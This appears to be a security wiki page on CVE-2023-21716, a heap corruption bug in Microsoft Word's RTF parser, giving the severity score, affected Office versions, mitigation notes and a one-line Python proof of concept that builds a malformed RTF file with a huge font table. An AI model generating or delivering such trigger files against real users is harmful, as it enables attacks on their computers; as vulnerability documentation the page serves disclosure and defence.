CVE-2023-21716 (Microsoft Word RCE)

CNA: Microsoft Corporation (more like telemetry corporation)
Base Score: 9.8 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Brief

It is a heap corruption vulnerability in Microsoft Word’s RTF parser that, if triggered, allows attackers to achieve remote code execution with the privileges of the victim.
The flaw does not require prior authentication: attackers can simply send a booby-trapped RTF file to the victim(s) via email.

Details

Affected products

Microsoft Office 365 (Insider Preview - 2211 Build 15831.20122 CTR)
Microsoft Office 2016 (Including Insider Slow - 1704 Build 8067.2032 CTR)
Microsoft Office 2013
Microsoft Office 2010
Microsoft Office 2007
Older versions may also be affected but were not tested. Furthermore, the technical details of this vulnerability have evolved over the years.

Mitigations

Microsoft Office 2010 and later use Protected View to limit damage caused by malicious documents procured from untrusted sources. Protected View is in effect when this vulnerability manifests and thus an additional sandbox escape vulnerability would be required to gain full privileges.

❗ Removing the file association for the RTF extension is ineffective because using a DOC extension will still reach the vulnerable code.

PoC

open("exploit.rtf", "wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rt''lch no crash??}\n}}\n").encode('utf-8'))

With email sent

PreviousForgot password of file ?NextSCCM | MECM

Last updated 11 months ago